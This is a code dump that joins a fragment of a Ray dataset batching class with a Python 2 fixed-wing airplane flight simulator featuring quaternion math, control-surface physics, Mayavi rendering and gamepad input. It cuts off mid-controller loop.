features: Dict[str, Dict],
training_set_metadata: Dict[str, Any],
batch_size: int,
samples_per_epoch: int,
):
self.dataset_epoch_iterator = dataset_epoch_iterator
self.batch_size = batch_size
self.samples_per_epoch = samples_per_epoch
self.training_set_metadata = training_set_metadata
self.features = features
self.columns = list(features.keys())
self.reshape_map = {
proc_column: training_set_metadata[feature[NAME]].get("reshape")
for proc_column, feature in features.items()
}
self.dataset_batch_iter = None
self._epoch = 0
self._next_batch = None
self._last_batch = False
self._step = 0
self._fetch_next_epoch()
def next_batch(self):
if self.last_batch():
raise StopIteration()
batch = self._next_batch
self._fetch_next_batch()
self._step += 1
return batch
def last_batch(self):
return self._last_batch
def set_epoch(self, epoch, batch_size):
self.batch_size = batch_size
if epoch != self._epoch:
self._fetch_next_epoch()
self._epoch = epoch
@property
def step(self):
return self._step
@property
def steps_per_epoch(self):
return math.ceil(self.samples_per_epoch / self.batch_size)
def _fetch_next_epoch(self):
dataset = next(self.dataset_epoch_iterator)
read_parallelism = 1
if read_parallelism == 1:
self.dataset_batch_iter = self._create_async_reader(dataset)
elif read_parallelism > 1:
self.dataset_batch_iter = self._create_async_parallel_reader(dataset, read_parallelism)
else:
# TODO: consider removing this. doesn't work currently and read performance seems generally
# very good with 1 parallelism
self.dataset_batch_iter = self._create_sync_reader(dataset)
self._step = 0
self._fetch_next_batch()
def _fetch_next_batch(self):
if self.dataset_batch_iter is None:
self._last_batch = True
return
self._last_batch = False
try:
self._next_batch = next(self.dataset_batch_iter)
except StopIteration:
self._last_batch = True
def _to_tensors_fn(self):
columns = self.columns
features = self.features
def to_tensors(df: pd.DataFrame) -> pd.DataFrame:
for c in columns:
# do not convert scalar columns: https://github.com/ray-project/ray/issues/20825
if features[c][TYPE] not in _SCALAR_TYPES:
df[c] = df[c].astype(TensorDtype())
return df
return to_tensors
def _prepare_batch(self, batch: pd.DataFrame) -> Dict[str, np.ndarray]:
res = {c: batch[c].to_numpy() for c in self.columns}
for c in self.columns:
reshape = self.reshape_map.get(c)
if reshape is not None:
res[c] = res[c].reshape((-1, *reshape))
return res
def _create_sync_reader(self, dataset: ray.data.Dataset):
to_tensors = self._to_tensors_fn()
def sync_read():
for batch in dataset.map_batches(to_tensors, batch_format="pandas").iter_batches(
prefetch_blocks=0, batch_size=self.batch_size, batch_format="pandas"
):
yield self._prepare_batch(batch)
return sync_read()
def _create_async_reader(self, dataset: ray.data.Dataset):
q = queue.Queue(maxsize=100)
batch_size = self.batch_size
to_tensors = self._to_tensors_fn()
def producer():
for batch in dataset.map_batches(to_tensors, batch_format="pandas").iter_batches(
prefetch_blocks=0, batch_size=batch_size, batch_format="pandas"
):
res = self._prepare_batch(batch)
q.put(res)
q.put(None)
def async_read():
t = threading.Thread(target=producer)
t.start()
while True:
batch = q.get(block=True)
if batch is None:
break
yield batch
t.join()
return async_read()
def _create_async_parallel_reader(self, dataset: ray.data.Dataset, num_threads: int):
q = queue.Queue(maxsize=100)
batch_size = self.batch_size
to_tensors = self._to_tensors_fn()
splits = dataset.split(n=num_threads)
def producer(i):
for batch in (
splits[i]
.map_batches(to_tensors, batch_format="pandas")
.iter_batches(prefetch_blocks=0, batch_size=batch_size, batch_format="pandas")
):
res = self._prepare_batch(batch)
q.put(res)
q.put(None)
def async_parallel_read():
threads = [threading.Thread(target=producer, args=(i,)) for i in range(num_threads)]
for t in threads:
t.start()
active_threads = num_threads
while True:
batch = q.get(block=True)
if batch is None:
active_threads -= 1
if active_threads == 0:
break
yield batch
for t in threads:
t.join()
return async_parallel_read()
|
airplane.py
|
#!/usr/bin/env python2
"""
Basic fixed-wing airplane simulator to test out an intuitive model.
This was a thrown-together messy modification of the software in
my multicopter repo.
"""
from __future__ import division
from threading import Thread
from collections import deque
import time
import numpy as np; npl = np.linalg # pip install numpy
from inputs import devices, get_gamepad # pip install inputs
from mayavi import mlab # http://docs.enthought.com/mayavi/mayavi/installation.html
from tvtk.tools import visual # ^^^
###################################################################### ADMIN SETUP
# Redirect pointlessly spammed mayavi warnings
import os, vtk
if os.path.exists("/dev/null"): shadow_realm = "/dev/null"
else: shadow_realm = "c:\\nul"
mlab_warning_output = vtk.vtkFileOutputWindow()
mlab_warning_output.SetFileName(shadow_realm)
vtk.vtkOutputWindow().SetInstance(mlab_warning_output)
###################################################################### MATH HELPERS
def quaternion_inverse(q):
"""
Returns the inverse of the given quaternion q = [x, y, z, w].
"""
invq = np.copy(q)
invq[:3] = -invq[:3]
return invq
def quaternion_multiply(ql, qr):
"""
Returns the quaternion multiplication ql * qr all in the form [x, y, z, w].
"""
return np.array((ql[0]*qr[3] + ql[1]*qr[2] - ql[2]*qr[1] + ql[3]*qr[0],
-ql[0]*qr[2] + ql[1]*qr[3] + ql[2]*qr[0] + ql[3]*qr[1],
ql[0]*qr[1] - ql[1]*qr[0] + ql[2]*qr[3] + ql[3]*qr[2],
-ql[0]*qr[0] - ql[1]*qr[1] - ql[2]*qr[2] + ql[3]*qr[3]))
def rotate_vector(q, v, reverse=False):
"""
Applies the given quaternion to a vector v.
If reverse is set to True, the inverse quaternion is applied instead.
"""
uv = 2*np.cross(q[:-1], v)
if reverse: return v - q[-1]*uv + np.cross(q[:-1], uv)
else: return v + q[-1]*uv + np.cross(q[:-1], uv)
def rotvec_from_quaternion(q):
"""
Returns the rotation vector corresponding to the quaternion q = [x, y, z, w].
A rotation vector is the product of the angle of rotation (0 to pi) and
axis of rotation (unit vector) of an SO3 quantity like a quaternion.
"""
q = np.array(q, dtype=np.float64)
sina2 = npl.norm(q[:-1])
if np.isclose(sina2, 0): return np.zeros(3, dtype=np.float64)
if q[-1] < 0: q = -q
return 2*np.arccos(q[-1]) * q[:-1]/sina2
def quaternion_from_rotvec(r):
"""
Returns the quaternion [x, y, z, w] equivalent to the given rotation vector r.
"""
angle = np.mod(npl.norm(r), 2*np.pi)
if np.isclose(angle, 0): return np.array([0, 0, 0, 1], dtype=np.float64)
return np.concatenate((np.sin(angle/2)*np.divide(r, angle), [np.cos(angle/2)]))
def rotmat_from_quaternion(q):
"""
Returns the rotation matrix associated with the quaternion q = [x, y, z, w].
"""
Q = 2*np.outer(q, q)
return np.array([[1-Q[1, 1]-Q[2, 2], Q[0, 1]-Q[2, 3], Q[0, 2]+Q[1, 3]],
[ Q[0, 1]+Q[2, 3], 1-Q[0, 0]-Q[2, 2], Q[1, 2]-Q[0, 3]],
[ Q[0, 2]-Q[1, 3], Q[1, 2]+Q[0, 3], 1-Q[0, 0]-Q[1, 1]]], dtype=np.float64)
def euler_from_quaternion(q):
"""
Returns the (roll, pitch, yaw) in radians associated with the quaternion q = [x, y, z, w].
"""
return np.array((np.arctan2(2*(q[3]*q[0] + q[1]*q[2]), 1 - 2*(q[0]**2 + q[1]**2)),
np.arcsin(2*(q[3]*q[1] - q[2]*q[0])),
np.arctan2(2*(q[3]*q[2] + q[0]*q[1]), 1 - 2*(q[1]**2 + q[2]**2))))
def quaternion_from_euler(roll, pitch, yaw):
"""
Returns the quaternion q = [x, y, z, w] associated with the Euler angles roll, pitch, and yaw in radians.
"""
cr = np.cos(0.5*roll)
sr = np.sin(0.5*roll)
cp = np.cos(0.5*pitch)
sp = np.sin(0.5*pitch)
cy = np.cos(0.5*yaw)
sy = np.sin(0.5*yaw)
return np.array([cy*sr*cp - sy*cr*sp,
cy*cr*sp + sy*sr*cp,
sy*cr*cp - cy*sr*sp,
cy*cr*cp + sy*sr*sp], dtype=np.float64)
def unwrap_angle(ang):
"""
Returns an equivalent angle to ang in radians on [-np.pi, np.pi].
"""
return np.mod(ang + np.pi, 2*np.pi) - np.pi
def ori_error(qdes, q):
"""
Does a Lie algebraic orientation error computation given quaternions qdes and q as [x, y, z, w].
The returned 3-vector is a rotvec in body-coordinates pointing along the geodesic from q to qdes.
"""
return rotvec_from_quaternion(quaternion_multiply(quaternion_inverse(q), qdes))
###################################################################### WORLD SETUP
# Local gravity (world frame)
grav = np.array([0.0, 0.0, -9.81]) # m/s^2
# Local density of air
dens = 1.225 # kg/m^3
# Function for wind velocity at time t
def wind(t):
return np.array([0, 0, 0]) # m/s
###################################################################### MODEL SETUP
class Surface(object):
def __init__(self, pc, q0, Cp1, Cp2, Cq, upoint, uaxis, umin, umax, udot):
self.pc = pc # center of pressure in surface coords
self.q0 = q0 # initial orientation of surface relative to body
self.Cp1 = Cp1
self.Cp2 = Cp2
self.Cq = Cq
self.upoint = upoint # mounting point in body coords (always surface origin)
self.uaxis = uaxis / npl.norm(uaxis) # axis of joint rotation in body coords
self.umin = umin # minimum joint angle
self.umax = umax # maximum joint angle
self.udot = abs(udot) # maximum deflection rate
self.ucmd = 0 # current joint command
self.u = 0 # current joint angle
self.q = np.copy(self.q0)
self.pc_body = self.upoint + rotate_vector(self.q, self.pc)
def update(self, dt):
err = self.ucmd - self.u
du = dt*self.udot
if abs(err) < du: self.u = self.ucmd
elif err > 0: self.u += du
else: self.u -= du
self.u = np.clip(self.u, self.umin, self.umax)
self.q = quaternion_multiply(self.q0, quaternion_from_rotvec(self.u*self.uaxis))
self.pc_body = self.upoint + rotate_vector(self.q, self.pc)
class FixWing(object):
def __init__(self):
# Total mass
self.m = np.float64(10) # kg
self.invm = 1/self.m
# Inertia matrix
self.M = np.zeros((3, 3), dtype=np.float64) # kg*m^2
self.M[0, 0] = 2*self.m
self.M[1, 1] = 2*self.m
self.M[2, 2] = 4*self.m
self.M[2, 0] = self.M[0, 2] = 1*self.m
self.M[1, 0] = self.M[0, 1] = 0
self.M[2, 1] = self.M[1, 2] = 0
self.invM = npl.inv(self.M)
# Linear and quadratic translational drag coefficients
self.Cp1 = 0.01*np.array([1, 10, 150], dtype=np.float64) # N/(m/s)
self.Cp2 = 0.01*np.array([1, 10, 150], dtype=np.float64) # N/(m/s)^2
# Main body center of drag and rotational drag coefficients
self.rc = np.array([0, 0, 0], dtype=np.float64) # m
self.Cq = np.array([30, 40, 20], dtype=np.float64) # N/(rad/s)
# Thrust from throttle ratio
self.kthr = 100 # N/eff
# Flight surfaces
raileron = Surface(pc=np.array([0, -1, 0]),
q0=np.array([0, 0, 0, 1]),
Cp1=np.array([0, 0, 0.01]),
Cp2=np.array([0, 0, 0.01]),
Cq=np.array([0, 0, 0]),
upoint=np.array([-0.1, -0.05, 0]),
uaxis=np.array([0, 1, 0]),
umin=-np.pi/6,
umax=np.pi/6,
udot=np.pi/1)
laileron = Surface(pc=np.array([0, 1, 0]),
q0=np.array([0, 0, 0, 1]),
Cp1=np.array([0, 0, 0.005]),
Cp2=np.array([0, 0, 0.005]),
Cq=np.array([0, 0, 0]),
upoint=np.array([-0.1, 0.05, 0]),
uaxis=np.array([0, 1, 0]),
umin=-np.pi/6,
umax=np.pi/6,
udot=np.pi/1)
elevator = Surface(pc=np.array([-1.3, 0, 0]),
q0=np.array([0, 0, 0, 1]),
Cp1=np.array([0, 0, 0.05]),
Cp2=np.array([0, 0, 0.05]),
Cq=np.array([0, 0, 0]),
upoint=np.array([-1.3, 0, 0.8]),
uaxis=np.array([0, -1, 0]),
umin=-np.pi/6,
umax=np.pi/6,
udot=np.pi/1)
rudder = Surface(pc=np.array([-1.5, 0, 0]),
q0=np.array([0, 0, 0, 1]),
Cp1=np.array([0, 0.05, 0]),
Cp2=np.array([0, 0.05, 0]),
Cq=np.array([0, 0, 0]),
upoint=np.array([-1, 0, 0]),
uaxis=np.array([0, 0, 1]),
umin=-np.pi/6,
umax=np.pi/6,
udot=np.pi/1)
self.surfaces = [raileron, laileron, elevator, rudder]
# Initial rigid body state, modified by self.update function
self.p = np.array([0, -20, 0], dtype=np.float64) # m
self.q = quaternion_from_euler(np.deg2rad(0), np.deg2rad(0), np.deg2rad(0)) # quaternion
self.v = np.array([0, 0, 0], dtype=np.float64) # m/s
self.w = np.array([0, 0, 0], dtype=np.float64) # rad/s
def update(self, thr, ail, elv, rud, t, dt):
"""
Updates internal rigid body state given throttle, surface commands,
the current time, and the timestep to forward simulate.
"""
wind_body = rotate_vector(self.q, wind(t), reverse=True)
vair = self.v + np.cross(self.w, self.rc) - wind_body
F_thr = np.array([self.kthr*thr, 0, 0])
F_drag = -dens*(self.Cp1 + self.Cp2*np.abs(vair))*vair
F_grav = self.m * rotate_vector(self.q, grav, reverse=True)
T_drag = np.cross(self.rc, F_drag) - self.Cq*self.w
ucmd = [ail*self.surfaces[0].umax, -ail*self.surfaces[1].umax, elv*self.surfaces[2].umax, rud*self.surfaces[3].umax]
F_surf_net = np.zeros(3)
T_surf_net = np.zeros(3)
for i, surf in enumerate(self.surfaces):
surf.ucmd = ucmd[i]
surf.update(dt)
vsurf = rotate_vector(surf.q, self.v + np.cross(self.w, surf.pc_body) - wind_body, reverse=True) # ignores rotation of surface itself
F_surf = rotate_vector(surf.q, -dens*(surf.Cp1 + surf.Cp2*np.abs(vsurf))*vsurf)
T_surf = np.cross(surf.pc_body, F_surf) - rotate_vector(surf.q, surf.Cq*rotate_vector(surf.q, self.w, reverse=True))
F_surf_net = F_surf_net + F_surf
T_surf_net = T_surf_net + T_surf
ap = self.invm*(F_thr + F_surf_net + F_drag + F_grav) - np.cross(self.w, self.v)
aq = self.invM.dot(T_surf_net + T_drag - np.cross(self.w, self.M.dot(self.w)))
self.p = self.p + rotate_vector(self.q, dt*self.v + 0.5*(dt**2)*ap)
self.q = quaternion_multiply(self.q, quaternion_from_rotvec(dt*self.w + 0.5*(dt**2)*aq))
self.v = self.v + dt*ap
self.w = self.w + dt*aq
# Basic ground
if self.p[2] < -0.01:
self.p[2] = 0
v_world = rotate_vector(self.q, self.v)
if v_world[2] < 0:
v_world[2] = 0
self.v = rotate_vector(self.q, v_world, reverse=True)
###################################################################### SCENE SETUP
class Viz(object):
def __init__(self, surfaces):
self.building_layout = np.ones((5, 5))
self.building_size = (30, 30, 40) # m
self.building_spacing = np.float64(100) # m
self.fig = mlab.figure(size=(500, 500), bgcolor=(0.1, 0.1, 0.1))
# Set figure for visual objects
visual.set_viewer(self.fig)
# Convenient local aliases
nx, ny = self.building_layout.shape
n = nx * ny
# Beautiful colors
self.building_colors = map(tuple, np.array((np.linspace(0.0, 0.0, n),
np.linspace(0.8, 0.3, n),
np.linspace(0.3, 0.8, n))).T)
# For storing buildings and their locations
self.buildings = []
self.building_centers = np.zeros((n, 2))
# Generate buildings
for i, x in enumerate(np.linspace(0, (nx-1)*(self.building_size[0] + self.building_spacing), nx)):
for j, y in enumerate(np.linspace(0, (ny-1)*(self.building_size[1] + self.building_spacing), ny)):
if not self.building_layout[i, j]: continue
idx = int(ny*i + j)
self.building_centers[idx] = (x, y)
self.buildings.append(visual.box(x=x, y=y, z=self.building_size[2]/2, size=self.building_size, color=self.building_colors[idx]))
# Generate ground plane
ground_xx, ground_yy = map(np.transpose, np.meshgrid(np.linspace(np.min(self.building_centers[:, 0]-50), np.max(self.building_centers[:, 0]+2500), 40),
np.linspace(np.min(self.building_centers[:, 1]-50), np.max(self.building_centers[:, 1]+2500), 40)))
self.ground = mlab.surf(ground_xx, ground_yy, np.random.sample(np.shape(ground_xx))-0.8, colormap="ocean", warp_scale=1)
# Generate aircraft
self.headspan = 0.4+2
self.tailspan = 0.6+2
self.wingspan = 0.8*(self.headspan + self.tailspan)
self.sweep = -0.2*0
self.rudheight = 0.2*self.wingspan
self.aircraft_nodes = np.vstack(([(self.headspan, 0, 0), (-self.tailspan, 0, 0)])).T
# [(0, 0, 0), (self.sweep, self.wingspan/2, 0)],
# [(0, 0, 0), (self.sweep, -self.wingspan/2, 0)],
# [(-self.tailspan, 0, 0), (-self.tailspan+self.sweep/5, 0, self.rudheight)],
# [(-self.tailspan+self.sweep/5, 0, self.rudheight), (-self.tailspan+self.sweep/5, self.wingspan/4, self.rudheight)],
# [(-self.tailspan+self.sweep/5, 0, self.rudheight), (-self.tailspan+self.sweep/5, -self.wingspan/4, self.rudheight)])).T
self.aircraft_fusel = np.vstack(([(self.headspan, 0, 0), (0, 0, 0)],
[(-self.tailspan, 0, 0), (-self.tailspan+self.sweep/5, 0, self.rudheight)])).T
self.aircraft_wings = np.vstack(([(self.sweep, self.wingspan/2, 0), (self.sweep, -self.wingspan/2, 0)])).T
self.aircraft_tail = np.vstack(([(-self.tailspan+self.sweep/4, 0.25*self.wingspan, self.rudheight), (-self.tailspan+self.sweep/4, -0.25*self.wingspan, self.rudheight)])).T
self.aircraft_nodes_plot = mlab.points3d(self.aircraft_nodes[0, :], self.aircraft_nodes[1, :], self.aircraft_nodes[2, :], scale_factor=0.2, color=(0.5, 0.5, 0.5))
self.aircraft_fusel_plot = mlab.plot3d(self.aircraft_fusel[0, :], self.aircraft_fusel[1, :], self.aircraft_fusel[2, :], tube_sides=10, tube_radius=0.08, color=(1, 0, 0))
self.aircraft_wings_plot = mlab.plot3d(self.aircraft_wings[0, :], self.aircraft_wings[1, :], self.aircraft_wings[2, :], tube_sides=10, tube_radius=0.08, color=(1, 0, 1))
self.aircraft_tail_plot = mlab.plot3d(self.aircraft_tail[0, :], self.aircraft_tail[1, :], self.aircraft_tail[2, :], tube_sides=10, tube_radius=0.05, color=(1, 1, 0))
self.aircraft_surface_plots = []
self.aircraft_surface_corners = np.array([[ 0.2, 1, 0],
[-0.2, 1, 0],
[-0.2, -1, 0],
[ 0.2, -1, 0]])
self.rudder_corners = np.array([[ 0.2, 0, 0.7,],
[-0.2, 0, 0.7,],
[-0.2, 0, 0.05,],
[ 0.2, 0, 0.05,]])
# for surf in surfaces:
# surf_corners_body = []
# for corner in self.aircraft_surface_corners:
# surf_corners_body.append(surf.upoint + rotate_vector(surf.q, surf.pc+corner))
# surf_corners_body = np.array(surf_corners_body)
# xx, yy = np.meshgrid(surf_corners_body[:2, 0], surf_corners_body[1:3, 1])
# self.aircraft_surface_plots.append(mlab.mesh(xx, yy, surf_corners_body[:, 2].reshape(2, 2), colormap="autumn"))
# Aliases for Mayavi animate decorator and show function
self.animate = mlab.animate
self.show = mlab.show
def update(self, p, q, surfaces, view_kwargs={}):
"""
Redraws the aircraft in fig according to the given position, quaternion, surfaces, and view.
"""
# Transform body geometry to world coordinates (using rotation matrix is faster for multiple points)
p = p.reshape(3, 1)
R = rotmat_from_quaternion(q)
aircraft_nodes_world = p + R.dot(self.aircraft_nodes)
aircraft_fusel_world = p + R.dot(self.aircraft_fusel)
aircraft_wings_world = p + R.dot(self.aircraft_wings)
aircraft_tail_world = p + R.dot(self.aircraft_tail)
# Update plot objects with new world coordinate information
self.aircraft_nodes_plot.mlab_source.set(x=aircraft_nodes_world[0, :], y=aircraft_nodes_world[1, :], z=aircraft_nodes_world[2, :])
self.aircraft_fusel_plot.mlab_source.set(x=aircraft_fusel_world[0, :], y=aircraft_fusel_world[1, :], z=aircraft_fusel_world[2, :])
self.aircraft_wings_plot.mlab_source.set(x=aircraft_wings_world[0, :], y=aircraft_wings_world[1, :], z=aircraft_wings_world[2, :])
self.aircraft_tail_plot.mlab_source.set(x=aircraft_tail_world[0, :], y=aircraft_tail_world[1, :], z=aircraft_tail_world[2, :])
for i, surf in enumerate(surfaces):
if i < 3:
surf_corners_body = []
for corner in self.aircraft_surface_corners:
surf_corners_body.append(surf.upoint + rotate_vector(surf.q, surf.pc+corner))
surf_corners_body = np.array(surf_corners_body)
surf_corners_world = (p + R.dot(surf_corners_body.T)).T
# xx, yy = np.meshgrid(surf_corners_world[:2, 0], surf_corners_world[1:3, 1])
# zz = np.vstack((surf_corners_world[:2, 2], surf_corners_world[:2, 2]))
# self.aircraft_surface_plots[i].mlab_source.set(x=xx, y=yy, z=zz)
if not hasattr(self, "ra_checker"):
self.ra_checker = mlab.plot3d(surf_corners_world[:, 0], surf_corners_world[:, 1], surf_corners_world[:, 2])
elif i==0:
self.ra_checker.mlab_source.set(x=surf_corners_world[:, 0], y=surf_corners_world[:, 1], z=surf_corners_world[:, 2])
if not hasattr(self, "la_checker"):
self.la_checker = mlab.plot3d(surf_corners_world[:, 0], surf_corners_world[:, 1], surf_corners_world[:, 2])
elif i==1:
self.la_checker.mlab_source.set(x=surf_corners_world[:, 0], y=surf_corners_world[:, 1], z=surf_corners_world[:, 2])
if not hasattr(self, "el_checker"):
self.el_checker = mlab.plot3d(surf_corners_world[:, 0], surf_corners_world[:, 1], surf_corners_world[:, 2])
elif i==2:
self.el_checker.mlab_source.set(x=surf_corners_world[:, 0], y=surf_corners_world[:, 1], z=surf_corners_world[:, 2])
if not hasattr(self, "ru_checker"):
self.ru_checker = mlab.plot3d(surf_corners_world[:, 0], surf_corners_world[:, 1], surf_corners_world[:, 2])
elif i==3:
surf_corners_body = []
for corner in self.rudder_corners:
surf_corners_body.append(surf.upoint + rotate_vector(surf.q, surf.pc+corner))
surf_corners_body = np.array(surf_corners_body)
surf_corners_world = (p + R.dot(surf_corners_body.T)).T
self.ru_checker.mlab_source.set(x=surf_corners_world[:, 0], y=surf_corners_world[:, 1], z=surf_corners_world[:, 2])
# Set camera view
if view_kwargs: mlab.view(**view_kwargs)
###################################################################### INTERFACE SETUP
class Command(object):
"""
Freedoms that would be commanded by a human pilot.
"""
def __init__(self, thr=0.0, roll=0.0, pitch=0.0, yaw=0.0):
self.thr = np.float64(thr)
self.roll = np.float64(roll)
self.pitch = np.float64(pitch)
self.yaw = np.float64(yaw)
class Pilot(object):
"""
User interface for remote-controlling.
Call start_pilot_thread to begin filling an internal buffer with user input.
Call get_command to execute / clear the buffer and get the current relevant Command object.
Call stop_pilot_thread when done!
max_thr: magnitude of the largest acceptable throttle command
max_roll: magnitude of the largest acceptable roll command
max_pitch: magnitude of the largest acceptable pitch command
max_yaw: magnitude of the largest acceptable yaw command
stick_deadband: fraction of analog joystick travel that should be treated as zero
trigger_deadband: fraction of analog trigger travel that should be treated as zero
max_buffer_size: maximum number of user commands that should be stored before dropping old ones
button_callbacks: dictionary of callback functions keyed by button names (A, B, X, Y, L, R, SL, SR, DV, DH, K)
"""
def __init__(self, max_thr=1, max_roll=1, max_pitch=1, max_yaw=1,
stick_deadband=0.1, trigger_deadband=0.0, max_buffer_size=200, button_callbacks={}):
self.max_thr = np.float64(max_thr)
self.max_roll = np.float64(max_roll)
self.max_pitch = np.float64(max_pitch)
self.max_yaw = np.float64(max_yaw)
self.stick_deadband = float(stick_deadband)
self.trigger_deadband = float(trigger_deadband)
self.max_buffer_size = int(max_buffer_size)
self.button_callbacks = button_callbacks
# Valid input device names in priority order
self.valid_device_names = ["Microsoft X-Box One pad (Firmware 2015)",
"PowerA Xbox One wired controller",
"Logitech Gamepad F310"]
# Set valid input device
self.input_device = None
for valid_device_name in self.valid_device_names:
if self.input_device is not None: break
for device in devices:
if device.name == valid_device_name:
self.input_device = device.name
print "Hello, Pilot! Ready to read from {}.".format(device.name)
break
if self.input_device is None: raise IOError("FATAL: No valid input device is connected!")
# Digital button code names
self.button_codes = {"BTN_SOUTH": "A", "BTN_EAST": "B", "BTN_NORTH": "X", "BTN_WEST": "Y",
"BTN_TL": "L", "BTN_TR": "R", "BTN_SELECT": "SL", "BTN_START": "SR",
"ABS_HAT0Y": "DV", "ABS_HAT0X": "DH", "BTN_MODE": "K"}
# Analog input characteristics
self.max_stick = 32767
if self.input_device == "Logitech Gamepad F310": self.max_trigger = 255
else: self.max_trigger = 1023
self.min_stick = int(self.stick_deadband * self.max_stick)
self.min_trigger = int(self.trigger_deadband * self.max_trigger)
# Internals
self.command = None
self.pilot_thread = None
self.stay_alive = False
self.buffer = deque([])
self.buffer_size_flag = False
def get_command(self):
"""
Executes / clears the input buffer and returns the current relevant Command object.
"""
if self.pilot_thread is None: raise AssertionError("FATAL: Cannot get_command without active pilot thread!")
while self.buffer:
event = self.buffer.pop()
if event.code == "ABS_Y": pass
elif event.code == "ABS_X": self.command.roll = self._stick_frac(event.state) * self.max_roll
elif event.code == "ABS_RY": self.command.pitch = -self._stick_frac(event.state) * self.max_pitch
elif event.code == "ABS_RX": self.command.yaw = self._stick_frac(event.state) * self.max_yaw
elif event.code == "ABS_Z": pass
elif event.code == "ABS_RZ": self.command.thr = self._trigger_frac(event.state) * self.max_thr
elif event.code in self.button_codes:
# if event.code == "BTN_WEST": self.command.start = int(event.state * self.mission_code)
# elif event.code == "BTN_NORTH": self.command.cancel = bool(event.state)
# elif event.code == "BTN_MODE": self.command.kill = bool(event.state)
self.button_callbacks.get(self.button_codes[event.code], lambda val: None)(event.state)
return self.command
def start_pilot_thread(self):
"""
Starts a thread that reads user input into the internal buffer.
"""
if self.stay_alive:
print "----------"
print "WARNING: Pilot thread already running!"
print "Cannot start another."
print "----------"
return
self.command = Command()
self.stay_alive = True
if self.input_device in ["Microsoft X-Box One pad (Firmware 2015)",
"PowerA Xbox One wired controller",
"Logitech Gamepad F310"]:
self.pilot_thread = Thread(target=self._listen_xbox)
else:
raise IOError("FATAL: No listener function has been implemented for device {}.".format(self.input_device))
print "Pilot thread has begun!"
self.pilot_thread.start()
def stop_pilot_thread(self):
"""
Terminates the Pilot's user input reading thread and clears the buffer.
"""
self.stay_alive = False
if self.pilot_thread is not None:
print "Pilot thread terminating on next input!"
self.pilot_thread.join() # stay secure
self.pilot_thread = None
while self.buffer:
self.buffer.pop()
self.buffer_size_flag = False
self.command = None
def _listen_xbox(self):
try:
while self.stay_alive:
self.buffer.appendleft(get_gamepad()[0]) # this is blocking (hence need for threading)
if len(self.buffer) > self.max_buffer_size:
if not self.buffer_size_flag:
self.buffer_size_flag = True
print "----------"
print "WARNING: Pilot input buffer reached {} entries.".format(self.max_buffer_size)
print "Dropping old commands."
print "----------"
self.buffer.pop()
finally:
print "Pilot thread terminated!"
self.pilot_thread = None
def _stick_frac(self, val):
if abs(val) > self.min_stick:
return np.divide(val, self.max_stick, dtype=np.float64)
return np.float64(0)
def _trigger_frac(self, val):
if abs(val) > self.min_trigger:
return np.divide(val, self.max_trigger, dtype=np.float64)
return np.float64(0)
# User button-press callbacks
####
# Toggle camera following
def bcb_A(val):
global cam_follow
if val:
if cam_follow: cam_follow = False
else: cam_follow = True
# Reset
def bcb_B(val):
global state0, fixwing, des_roll, des_pitch, des_yaw, des_w0, des_w1, des_w2, rc, integ_roll, integ_pitch
if val:
fixwing.p = state0[0]
fixwing.q = state0[1]
fixwing.v = state0[2]
fixwing.w = state0[3]
des_roll = 0
des_pitch = 0
des_yaw = 0
des_w0 = 0
des_w1 = 0
des_w2 = 0
rc = np.array([0, 0, 0])
integ_roll = 0
integ_pitch = 0
# Zoom-out camera
def bcb_L(val):
global cam_dist_rate
cam_dist_rate = val*20 # m/s
# Zoom-in camera
def bcb_R(val):
global cam_dist_rate
cam_dist_rate = -val*20 # m/s
# # Decrement mission code
# def bcb_SL(val):
# pilot.mission_code -= int(val)
# if pilot.mission_code < 0: pilot.mission_code = 0
# if val: print "Prepared for mission {}.".format(pilot.mission_code)
# # Increment mission code
# def bcb_SR(val):
# pilot.mission_code += int(val)
# if val: print "Prepared for mission {}.".format(pilot.mission_code)
# Change camera elevation
def bcb_DV(val):
global cam_elev_rate
cam_elev_rate = val*45 # deg/s
# Change camera azimuth
def bcb_DH(val):
global cam_azim_rate
cam_azim_rate = val*45 # deg/s
####
###################################################################### SIMULATION
# Time and timestep
t = time.time() # s
dt = 0.01 # s
# Aircraft, scene, and user
fixwing = FixWing()
state0 = [fixwing.p, fixwing.q, fixwing.v, fixwing.w]
viz = Viz(fixwing.surfaces)
pilot = Pilot(button_callbacks={"A": bcb_A, "B": bcb_B, "L": bcb_L, "R": bcb_R, "DV": bcb_DV, "DH": bcb_DH})
# "SL": bcb_SL, "SR": bcb_SR, "DV": bcb_DV, "DH": bcb_DH})
# Initial camera condition
cam_state = {"focalpoint": fixwing.p.tolist(), "azimuth": 180, "elevation": 85, "distance": 25} # m and deg
cam_azim_rate = 0
cam_elev_rate = 0
cam_dist_rate = 0
cam_follow = True
# Adaptive estimate of CoP, integrators, smoothers etc...
rc = np.array([0, 0, 0])
integ_roll = 0
integ_pitch = 0
des_roll = 0
des_pitch = 0
des_yaw = 0
des_w0 = 0
des_w1 = 0
des_w2 = 0
use_controller = 0
use_tgen = True
use_course = False
# Simulation loop function
@viz.animate(delay=50) # ms (20 FPS is the best Mayavi can do)
def simulate():
global cam_state, t, rc, integ_roll, integ_pitch, des_roll, des_pitch, des_yaw, des_w0, des_w1, des_w2
while True:
# Between each scene render, simulate up to real-time
while t < time.time():
# Update user input commands and compute efforts needed to achieve those commands
cmd = pilot.get_command()
lim = np.deg2rad(60)
roll, pitch, yaw = euler_from_quaternion(fixwing.q)
if use_tgen: # whether or not to smooth inputs
spring = 0.8
damp = 2*np.sqrt(spring)
des_a0 = spring*(cmd.roll*lim - des_roll) - damp*des_w0
des_w0 += dt*des_a0
des_roll += dt*des_w0 + 0.5*dt**2*des_a0
des_a1 = spring*(cmd.pitch*lim - des_pitch) - damp*des_w1
des_w1 += dt*des_a1
des_pitch += dt*des_w1 + 0.5*dt**2*des_a1
if use_course:
des_a2 = 5*(-np.deg2rad(10)*cmd.yaw - des_w2)
des_w2 += dt*des_a2
des_yaw += dt*des_w2 + 0.5*dt**2*des_a2
des_yaw = unwrap_angle(des_yaw)
else:
des_yaw = yaw
des_w2 = -cmd.yaw*np.deg2rad(10)
else:
des_roll = cmd.roll*lim
des_pitch = cmd.pitch*lim
des_yaw = yaw
des_w0 = des_w1 = 0
des_w2 = -cmd.yaw*np.deg2rad(10)
e = rotvec_from_quaternion(quaternion_multiply(quaternion_inverse(fixwing.q), quaternion_from_euler(des_roll, des_pitch, des_yaw)))
kp = [20, 10, 10]
kd = [10, 10, 10]
if not use_course: kp[2] = 0
if use_controller == 1: # simple PD
uroll = kp[0]*(des_roll - roll) + kd[0]*(des_w0 - fixwing.w[0])
upitch = kp[1]*(des_pitch - pitch) + kd[1]*(des_w1 - fixwing.w[1])
